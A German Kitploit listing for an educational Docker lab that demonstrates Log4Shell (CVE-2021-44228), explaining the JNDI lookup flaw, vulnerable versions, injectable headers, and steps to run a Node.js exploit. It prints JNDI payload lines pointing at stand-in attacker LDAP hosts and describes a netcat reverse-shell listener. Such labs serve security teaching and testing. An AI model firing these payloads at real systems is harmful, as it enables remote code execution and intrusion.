Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
EXPLOIT-CVE-2021-44228 — Docker-basiertes Bildungslabor, das die Log4Shell (CVE-2021-44228) RCE-Ausnutzung mit einer verwundbaren Java-Anwendung, einem LDAP-Weiterleiter und einem automatisierten Exploit-Skript demonstriert. | Kitploit
Tools/GitHubGitHub/joaovicdev/exploit-cve-2021-44228
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubjoaovicdev/exploit-cve-2021-44228

EXPLOIT-CVE-2021-44228

Docker-basiertes Bildungslabor, das die Log4Shell (CVE-2021-44228) RCE-Ausnutzung mit einer verwundbaren Java-Anwendung, einem LDAP-Weiterleiter und einem automatisierten Exploit-Skript demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
4vor 5 MonatenNoch nicht geprüft
Teilen

CVE-2021-44228 — Log4Shell PoC Labor

DISCLAIMER

Dieses Labor wurde ausschließlich für Bildungs- und Sicherheitsforschungszwecke erstellt. Der gesamte Verkehr findet innerhalb eines isolierten Docker-Netzwerks statt. Verwenden Sie dieses Material nicht in realen Systemen oder ohne ausdrückliche Genehmigung. Missbrauch kann strafbar sein. Verwenden Sie es verantwortungsbewusst.


Was ist CVE-2021-44228?

Log4Shell ist eine kritische Schwachstelle (CVSS 10.0), die im Dezember 2021 in der weit verbreiteten Java-Logging-Bibliothek Apache Log4j 2 entdeckt wurde.

Wie die Schwachstelle auftritt

Log4j verfügt über eine Funktion zur Interpolation von Ausdrücken: Beim Protokollieren einer Nachricht wertet es Strings im Format ${...} aus. Beispielsweise wird ${java:version} durch die Java-Version zur Laufzeit ersetzt.

Das Problem liegt in der Unterstützung des JNDI-Protokolls (Java Naming and Directory Interface). Wenn Log4j auf einen Ausdruck wie

root@kitploit:~
${jndi:ldap://angreifer.com/exploit}

trifft, weist es die JVM an, eine durchzuführen. Der Server antwortet mit einem Verweis auf eine entfernte Java-Klasse – und die JVM , was zu führt.

LDAP-Abfrage an den Server des Angreifers
lädt diese Klasse herunter und führt sie aus
Remote Code Execution (RCE)

Der Angriffsvektor ist einfach: Jedes Feld, das vom Server protokolliert wird (HTTP-Header, Formularfelder, Cookies usw.), kann der Einstiegspunkt für die Payload sein.

Betroffene Versionen

  • Log4j 2.0-beta9 bis 2.14.1
  • Behoben in Version 2.15.0 (und endgültig in 2.17.0)

Verwundbare Umgebung

Das Lab simuliert eine reale Java-Anwendung unter Verwendung der verwundbaren Versionen.

KomponenteVersionWarum ist es verwundbar
Apache Log4j2.14.1Wertet ${jndi:...} ohne Einschränkungen aus
JDK1.8.0_181Vor dem Patch 8u191, der trustURLCodebase=false setzt
Spring Boot2.5.6Nur das Web-Framework; die Schwachstelle liegt in Log4j

Verwundbarer Endpunkt

root@kitploit:~
GET http://localhost:8080/log

Die folgenden Header werden direkt von Log4j protokolliert – jeder von ihnen kann der Injektionsvektor sein:

  • X-Api-Version
  • User-Agent
  • X-Auth-Token

Infrastruktur des Angreifers (Container attacker)

DienstPortFunktion
marshalsec (LDAP)1389Empfängt den JNDI-Lookup und leitet an den HTTP-Server weiter
Python HTTP-Server8888Liefert die Exploit.class an die JVM des Opfers
netcat-Listener9001Empfängt die Reverse-Shell-Verbindung

So verwenden Sie den Exploit

Voraussetzungen

  • Docker und Docker Compose installiert
  • Node.js installiert (für den Exploit)

1. Gesamte Umgebung starten

root@kitploit:~
docker-compose up --build

Warten Sie, bis in den Logs Folgendes erscheint:

root@kitploit:~
[*] Waiting for reverse shell on :9001 ...
Started Application in X seconds

2. Exploit starten

Öffnen Sie ein weiteres Terminal und führen Sie den Node.js-Exploit aus:

root@kitploit:~
node exploit/exploit.js

Erwartete Ausgabe:

root@kitploit:~
[*] CVE-2021-44228 — Log4Shell PoC
[*] Target  : http://localhost:8080/log
[*] Header  : X-Api-Version
[*] Payload : ${jndi:ldap://attacker:1389/Exploit}

[+] Response : 200 OK
[+] Body     : logged

[+] Payload delivered — check the attacker nc listener on port 9001

3. Ausführung überprüfen

Beobachten Sie das Terminal, in dem docker-compose läuft. In den Logs des Containers attacker sehen Sie die eingehende Reverse-Shell-Verbindung auf Port 9001.

Um das touch /tmp/pwned innerhalb der verwundbaren App zu bestätigen:

root@kitploit:~
docker exec -it log4j-cve-2021-44228-vulnerable-app-1 ls /tmp/pwned

Benutzerdefinierte Argumente (optional)

root@kitploit:~
# node exploit/exploit.js [target] [ldapHost] [ldapPort] [className] [header]
node exploit/exploit.js http://localhost:8080/log attacker 1389 Exploit "User-Agent"

By Guaxinim | Cyber Security Research

Tool herunterladen